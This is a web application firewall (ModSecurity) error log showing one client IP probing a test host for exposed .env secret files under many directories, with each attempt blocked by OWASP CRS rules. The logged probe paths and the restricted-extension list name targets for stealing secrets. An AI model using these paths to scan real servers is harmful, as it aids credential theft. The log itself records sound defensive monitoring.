[Thu Dec 18 01:52:25.523490 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAoAAAAAE"]
[Thu Dec 18 01:52:25.523708 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAoAAAAAE"]
[Thu Dec 18 01:52:25.523908 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAoAAAAAE"]
[Thu Dec 18 01:52:25.553942 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAoQAAAAE"]
[Thu Dec 18 01:52:25.554162 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAoQAAAAE"]
[Thu Dec 18 01:52:25.554366 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAoQAAAAE"]
[Thu Dec 18 01:52:25.584155 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAogAAAAE"]
[Thu Dec 18 01:52:25.584361 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAogAAAAE"]
[Thu Dec 18 01:52:25.584531 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAogAAAAE"]
[Thu Dec 18 01:52:25.621339 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAowAAAAE"]
[Thu Dec 18 01:52:25.621539 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAowAAAAE"]
[Thu Dec 18 01:52:25.621703 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAowAAAAE"]
[Thu Dec 18 01:52:25.652960 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApAAAAAE"]
[Thu Dec 18 01:52:25.653152 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApAAAAAE"]
[Thu Dec 18 01:52:25.653306 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApAAAAAE"]
[Thu Dec 18 01:52:25.685299 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApQAAAAE"]
[Thu Dec 18 01:52:25.685480 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApQAAAAE"]
[Thu Dec 18 01:52:25.685628 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApQAAAAE"]
[Thu Dec 18 01:52:25.719976 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApgAAAAE"]
[Thu Dec 18 01:52:25.720174 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApgAAAAE"]
[Thu Dec 18 01:52:25.720350 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApgAAAAE"]
[Thu Dec 18 01:52:25.751498 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApwAAAAE"]
[Thu Dec 18 01:52:25.751682 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApwAAAAE"]
[Thu Dec 18 01:52:25.751820 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUNQSVXYVi-cYqymYgYApwAAAAE"]
[Thu Dec 18 01:52:25.782462 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqAAAAAE"]
[Thu Dec 18 01:52:25.782630 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqAAAAAE"]
[Thu Dec 18 01:52:25.782804 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqAAAAAE"]
[Thu Dec 18 01:52:25.813624 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqQAAAAE"]
[Thu Dec 18 01:52:25.813793 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqQAAAAE"]
[Thu Dec 18 01:52:25.813937 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqQAAAAE"]
[Thu Dec 18 01:52:25.846555 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqgAAAAE"]
[Thu Dec 18 01:52:25.846705 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqgAAAAE"]
[Thu Dec 18 01:52:25.846840 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUNQSVXYVi-cYqymYgYAqgAAAAE"]
[Thu Dec 18 01:52:25.880054 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUNQSVXYVi-cYqymYgYAqwAAAAE"]
[Thu Dec 18 01:52:25.880155 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUNQSVXYVi-cYqymYgYAqwAAAAE"]
[Thu Dec 18 01:52:25.880299 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUNQSVXYVi-cYqymYgYAqwAAAAE"]
[Thu Dec 18 01:52:25.880439 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUNQSVXYVi-cYqymYgYAqwAAAAE"]
[Thu Dec 18 01:52:26.025598 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNQSlXYVi-cYqymYgYArwAAAAE"]
[Thu Dec 18 01:52:26.025749 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNQSlXYVi-cYqymYgYArwAAAAE"]
[Thu Dec 18 01:52:26.025896 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNQSlXYVi-cYqymYgYArwAAAAE"]
